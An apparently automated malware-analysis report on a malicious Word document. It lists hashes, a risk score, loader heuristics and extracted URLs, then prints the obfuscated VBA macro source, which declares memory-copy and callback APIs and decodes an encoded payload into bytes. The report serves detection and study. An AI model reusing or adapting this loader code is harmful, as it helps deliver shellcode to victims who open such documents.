Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 79a849e37deb3e60…

MALICIOUS

Office (OLE)

166.0 KB Created: 2016-10-17 13:09:00 Authoring application: Microsoft Office Word First seen: 2018-08-05
MD5: 588042ea084dd4654f6201e1ddbd8816 SHA-1: 8b1e9f2eea9c465b4b238404103d9573806f4a3f SHA-256: 79a849e37deb3e608c179dadf6866ff1205c563995f237c9b9d7d83ea52f6864
Risk Score: 82

Heuristics 3

  • Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER
    Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (In document text (OLE body))
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (In document text (OLE body))
    • http://ns.adobe.com/camera-raw-settings/1.0/ (In document text (OLE body))
    • http://ns.adobe.com/photoshop/1.0/ (In document text (OLE body))
    • http://purl.org/dc/elements/1.1/ (In document text (OLE body))
    • http://ns.adobe.com/xap/1.0/mm/ (In document text (OLE body))
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (In document text (OLE body))
    • http://www.iec.ch (In document text (OLE body))

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6720 bytes
SHA-256: a6bdbae148026a2c52399c8c2ef348b757c3b5f7b621c1fa447e2283226decd9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "accountable"
#If Win64 Then
Public Type delicatessen
header As LongPtr
End Type
Public Declare PtrSafe Function plowboy Lib "user32" Alias "EndDialog" (ByVal gaseous As LongPtr,nResult As LongPtr) As LongPtr
Public  Declare PtrSafe Function outcome Lib "kernel32" Alias "EnumUILanguagesW" (ByVal typographical As Any, ByVal flags As Any, steel As Any) As LongPtr
Public Declare PtrSafe Function spongy Lib "user32" Alias "GetWindowText" (hwnd As LongPtr, buf As Any, nMaxCount As LongPtr) As LongPtr
Public Declare PtrSafe Function quaterque Lib "kernel32" Alias "TlsAlloc" () As LongPtr
Public  Declare PtrSafe Sub kyles Lib "ntdll" Alias "RtlMoveMemory" (fecundify As Any, disenthrone As Any, ByVal diastole As LongPtr)
Public  Declare PtrSafe Function circumduction Lib "kernel32" Alias "HeapCreate" (ByVal coleridge As LongPtr,forefathers As delicatessen, fulfillment As delicatessen) As LongPtr
Public Declare PtrSafe Function disentanglement Lib "kernel32" Alias "RemoveDirectoryA" (nigerien As LongPtr)
Public Declare PtrSafe Function heckelphone Lib "user32" Alias "GetDC" (ByVal pop As LongPtr) As LongPtr
Public Declare PtrSafe Function illustrated Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
Public  Declare PtrSafe Function RtlAllocateHeap Lib "ntdll" (ByVal arpent As LongPtr, ByVal squeegee As  LongPtr, ByVal blather As LongPtr) As LongPtr

#Else
Public Declare Function butte Lib "user32" Alias "GetWindowText" (hwnd As Long, buf As Any, nMaxCount As Long) As Long
Public Declare Function lumpfish Lib "kernel32" Alias "RemoveDirectoryA" (babbler As Long)
Public Declare Function febrifugal Lib "user32" Alias "GetDC" (cowardice As Long) As Long
Public Declare Function caviar Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
Public Declare Function cruel Lib "user32" Alias "EndDialog" (ByVal unjustifiably As Long, cilium As Long) As Long
Public Declare Function RtlAllocateHeap Lib "ntdll" (ByVal chronography As Long, ByVal steatornis As Long, ByVal proletaire As Long) As Long
Public Declare Function circumduction Lib "kernel32" Alias "HeapCreate" (ByVal nonaddictive As Long, ByVal fruitbearing As Long, ByVal decuration As Long) As Long
Public Declare Function outcome Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal blunted As Any, lParam As Any) As Long
Public Declare Sub kyles Lib "ntdll" Alias "RtlMoveMemory" (aidance As Any, motile As Any, ByVal meditate As Long)
Public Declare Function unfree Lib "kernel32" Alias "TlsAlloc" () As Long

#End If
Sub zoom()
    With Documents("Sample.doc").Windows(1).View
        .Type = wdPrintView
        With .zoom
            .PageColumns = 3
            .PageRows = 2
        End With
    End With
End Sub


Function synopsis(necessitarian, reenforcement)
synopsis = necessitarian \ reenforcement
End Function
Function aggression(cowl, crinkled)
aggression = cowl * crinkled
End Function
Function christmasberry(crosswind, pendency)
christmasberry = crosswind And pendency
End Function
Function animative(carbolated) As String
Dim digress As Long
Dim coatrack(63) As Long
Dim imperially As Integer
Dim letoile(63) As Long
capillament = confined

Dim glyceraldehyde As Integer

Dim ingenerate() As Byte
Dim incircumspect(63) As Long
Dim unvariedness As Long
Dim corrivalship As String

Dim morgantown(255) As Byte
Dim bang As Long
Dim almondshaped As Integer

Dim proteinaceous As String
Dim synercus() As Byte
Dim coreference As Long
confined = "multure"

galleon = 116 + 16514956
equitation = 143 + 65393
actuarial = 99 + 3933
Dim afterage As Byte

reach = 1 + 62
acarina = 65280
mitrailleuse = 294 - 39
edelweiss = 64
drawknife = 4096
Dim chambers As Long

cuquenan = 262144
adytum = 17 + 16711663
Dim procellariidae As Long

chromatin = 256
rejuvenation = 258048
Dim mallard As String
Dim plethodon() As Byte
ReDim plethodon(4287)
rioter = 357 + 3931
For i = 1 To rioter
malecite = Mid(carbolated, i, 1)
unrecognizable = (Asc(malecite))
sigmoidoscope = "aboutface"
plethodon(i - 1) = unrecognizable
Next
Dim tragically As String
For brooch = 14 To 67
attentiveness = 67
buchloe = "abolishable"
dreams = Mid("apoplexyahbellows", 9, 2) & LCase("oRSE")
dreams = "pl" & Left("ottebra", 4) & LCase("r")
Next brooch

balinese = 245 + 4042
footsteps = 35
For clamydospore = 0 To balinese
plethodon(clamydospore) = plethodon(clamydospore) + 2
Next clamydospore
For elaphurus = 15 To 72
heirapparent = 72
ensue = ensue And 351
quiddet = Mid("mouchardmihindu", 9, 2) & RightB$("hootdrib", 4)
quiddet = "ma" & Mid("biochemicallylposedextirpation", 14, 6)
Next elaphurus

imperially = 0
memorization = 465 - 343
mycomycin = 501 - 246
For coreference = 0 To mycomycin
Select Case coreference
Case 65 To 90
morgantown(coreference) = coreference - 65
Case 97 To memorization
morgantown(coreference) = coreference - 71
Case 48 To 57
morgantown(coreference) = coreference + 4
Case 43
morgantown(coreference) = 62
Case 47
morgantown(coreference) = 63
End Select
Next coreference
For coreference = 0 To 63
coatrack(coreference) = aggression(coreference, edelweiss)
incircumspect(coreference) = aggression(coreference, drawknife)
letoile(coreference) = aggression(coreference, cuquenan)
Next coreference
For clavicle = 18 To 55
micelle = 55
ensue = pokeweed And 483
adiaphanous = Mid("arbeitmatcatasetum", 7, 3) & "ronag" & RightB$("playsomee", 1)
adiaphanous = LCase("El") & Mid("bryonyeventhfatuis", 7, 6)
Next clavicle

ingenerate = plethodon
aleurone = 346 - 342
ReDim synercus((((4287 + 1) \ aleurone) * 3) - 1)
For choeronycteris = 10 To 50
dichtung = 50
pokeweed = pokeweed And 311
faut = Mid("humaniequcost", 7, 3) & Left("ipolltachypleus", 5) & LCase("Ent")
faut = "ch" & RightB$("orthologyink", 3)
Next choeronycteris

kosteletzya = 380 - 377
averment = averment / 341

pokeweed = anisogamic - 277

lachrymatory = kosteletzya + 1
maniclike = 189 - 187
For unvariedness = 0 To 4287 Step lachrymatory
checkmake = ingenerate(unvariedness)
bang = letoile(morgantown(checkmake)) _
 + incircumspect(morgantown(ingenerate(unvariedness + 1))) + coatrack(morgantown(ingenerate(unvariedness + 2))) + morgantown(ingenerate(unvariedness + kosteletzya))
coreference = christmasberry(bang, adytum)
synercus(digress) = synopsis(coreference, equitation)
coreference = christmasberry(bang, acarina)
synercus(digress + 1) = synopsis(coreference, chromatin)
synercus(digress + maniclike) = christmasberry(bang, mitrailleuse)
digress = digress + maniclike + 1
Next unvariedness
animative = synercus
End Function